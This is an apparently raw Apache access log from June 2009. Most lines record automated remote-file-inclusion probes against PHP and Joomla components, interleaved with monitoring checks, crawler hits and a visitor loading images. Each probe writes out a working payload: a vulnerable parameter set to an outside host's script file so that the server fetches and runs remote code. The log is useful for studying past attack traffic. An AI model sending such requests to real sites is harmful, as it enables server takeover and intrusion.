121.78.82.142 - - [21/Jun/2009:06:18:46 -0400] "GET /logs//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:06:18:46 -0400] "GET /logs/access_log.Q109051700//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
217.147.30.80 - - [21/Jun/2009:06:18:53 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:06:18:54 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:06:19:05 -0400] "GET /logs/access_log.Q109061500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
217.147.30.80 - - [21/Jun/2009:06:19:08 -0400] "GET /logs/access_log.Q109052600//components/com_cpg/cpg.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
121.78.82.142 - - [21/Jun/2009:06:21:29 -0400] "GET /logs/access_log.Q109051700%20%20//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:06:21:29 -0400] "GET /logs/access_log.Q109052600%20%20//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
83.170.83.216 - - [21/Jun/2009:06:22:35 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
83.98.209.71 - - [21/Jun/2009:06:22:38 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:22:40 -0400] "GET /logs/access_log.Q109060100%20%20//main.php?sayfa=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:23:08 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:23:08 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:23:08 -0400] "GET /logs/access_log.Q109061500%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
217.147.29.190 - - [21/Jun/2009:06:23:09 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.808"
209.59.12.99 - - [21/Jun/2009:06:23:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.30.80 - - [21/Jun/2009:06:23:26 -0400] "GET /logs/access_log.Q109051100%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
83.170.83.216 - - [21/Jun/2009:06:24:09 -0400] "GET /logs/access_log.Q109051100/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:24:09 -0400] "GET /http://galera.pt/log.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:24:09 -0400] "GET /logs/http://galera.pt/log.txt? HTTP/1.1" 404 227 "-" "libwww-perl/5.808"
83.170.83.216 - - [21/Jun/2009:06:24:32 -0400] "GET /logs/access_log.Q109061500/http://galera.pt/log.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
209.172.33.230 - - [21/Jun/2009:06:26:45 -0400] "GET /logs//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:45 -0400] "GET //main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:45 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:46 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:50 -0400] "GET /logs//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:50 -0400] "GET //main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:50 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:50 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:52 -0400] "GET //main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:52 -0400] "GET /logs//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:52 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:26:52 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:26:53 -0400] "GET /logs/access_log.Q109051800//main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:26:53 -0400] "GET /logs//main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:26:53 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:26:53 -0400] "GET //main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:27:12 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
88.191.89.138 - - [21/Jun/2009:06:27:12 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:27:32 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:27:32 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:27:42 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:27:42 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:28:09 -0400] "GET /logs/access_log.Q109061500///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:28:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
84.201.208.50 - - [21/Jun/2009:06:28:25 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:28:26 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:28:26 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:28:26 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:29:01 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:29:01 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:29:01 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:29:11 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:29:49 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:29:49 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:29:49 -0400] "GET /logs/access_log.Q109060300%20%20/components/com_forum/download.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.202.2.220 - - [21/Jun/2009:06:30:46 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.202.2.220 - - [21/Jun/2009:06:30:46 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.202.2.220 - - [21/Jun/2009:06:30:46 -0400] "GET /convert/mvcw.php?vwar_root=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
84.201.208.50 - - [21/Jun/2009:06:31:31 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:31:31 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:32:40 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.201.208.50 - - [21/Jun/2009:06:32:40 -0400] "GET /logs/access_log.Q109051500//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.200.36.154 - - [21/Jun/2009:06:32:42 -0400] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.78.82.142 - - [21/Jun/2009:06:32:43 -0400] "GET /logs/access_log.Q109052600//components/com_flyspray/startdown.php?file=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.249.71.14 - - [21/Jun/2009:06:32:52 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L309C144889029200E54F04L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.76.180.87 - - [21/Jun/2009:06:33:27 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
83.76.180.87 - - [21/Jun/2009:06:33:27 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
209.59.12.99 - - [21/Jun/2009:06:34:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.202.2.220 - - [21/Jun/2009:06:34:17 -0400] "GET /logs/access_log.Q109052900/convert/mvcw.php?vwar_root=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
121.165.73.157 - - [21/Jun/2009:06:34:41 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
83.98.209.71 - - [21/Jun/2009:06:35:20 -0400] "GET /logs/access_log.Q109051200/components/com_forum/download.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
83.98.209.71 - - [21/Jun/2009:06:35:22 -0400] "GET /logs/access_log.Q109061100/components/com_forum/download.php?phpbb_root_path=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
212.200.36.154 - - [21/Jun/2009:06:36:06 -0400] "GET /logs/access_log.Q109060300/?_SERVER[DOCUMENT_ROOT]=http://www.petitbijouonline.com/lib/idfx1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:06:38:39 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
121.165.73.157 - - [21/Jun/2009:06:38:40 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
121.165.73.157 - - [21/Jun/2009:06:38:40 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
66.249.71.14 - - [21/Jun/2009:06:38:49 -0400] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64808 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [21/Jun/2009:06:39:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:06:39:31 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:39:31 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:39:31 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:39:34 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:39:34 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:39:37 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:39:44 -0400] "GET /logs/access_log.Q109051800%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.172.33.230 - - [21/Jun/2009:06:39:44 -0400] "GET /logs/access_log.Q109051000%20%20//main.php?sayfa=http://www.0118099987.com/board/down/id132_860233/1818/baner.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.202.2.220 - - [21/Jun/2009:06:41:34 -0400] "GET /logs/error_log.Q108072200/convert/mvcw.php?vwar_root=http://140.124.85.76//appserv/Fx198.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
83.76.180.87 - - [21/Jun/2009:06:41:41 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19"
195.34.78.110 - - [21/Jun/2009:06:42:56 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:42:56 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:42:56 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:42:56 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:42:56 -0400] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:42:57 -0400] "GET /logs/access_log.Q109061100%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:43:42 -0400] "GET /?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:43:42 -0400] "GET /logs/access_log.Q109052000/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:43:42 -0400] "GET /logs/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:44:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.54 - - [21/Jun/2009:06:44:39 -0400] "GET /images/over-index_membranes.jpg HTTP/1.1" 200 3290 "-" "Googlebot-Image/1.0"
222.122.142.249 - - [21/Jun/2009:06:44:52 -0400] "GET /logs/access_log.Q109051000/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:45:29 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:45:31 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:45:32 -0400] "GET /logs/access_log.Q109061100//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:45:35 -0400] "GET /logs/access_log.Q109050700//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:45:52 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:45:52 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 200 6382 "-" "Mozilla/5.0"
94.23.200.54 - - [21/Jun/2009:06:46:04 -0400] "GET /logs/access_log.Q109061400///?_SERVER[DOCUMENT_ROOT]=http://www.lawnwith.net///bbs/icon/fx29id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.158.98.196 - - [21/Jun/2009:06:46:51 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
218.158.98.196 - - [21/Jun/2009:06:46:51 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.158.98.196 - - [21/Jun/2009:06:47:01 -0400] "GET /logs/access_log.Q109052800//include/admin.lib.inc.php?site_path=http://www.recanatini.it/ra/office1.jpg??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:49:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:06:49:24 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:49:40 -0400] "GET /logs/access_log.Q109050700%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
121.165.73.157 - - [21/Jun/2009:06:50:06 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://polimerco.ru/idmantebscan.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
222.122.142.249 - - [21/Jun/2009:06:54:00 -0400] "GET /?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:54:00 -0400] "GET /logs/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 200 6376 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:54:00 -0400] "GET /logs/access_log.Q109052000/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.34.78.110 - - [21/Jun/2009:06:54:01 -0400] "GET /logs/access_log.Q109052900//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [21/Jun/2009:06:54:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.34.78.110 - - [21/Jun/2009:06:54:12 -0400] "GET /logs/access_log.Q109052900//admin/classes/TplLoad.php?full_path_to_public_program=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.142.249 - - [21/Jun/2009:06:55:16 -0400] "GET /logs/access_log.Q109051000/?dir[func]=&dir[base]=http://www.hongik.ac.kr/ad/counts/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:57:07 -0400] "GET /convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:57:07 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:57:07 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:57:21 -0400] "GET /convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
151.1.154.24 - - [21/Jun/2009:06:57:21 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
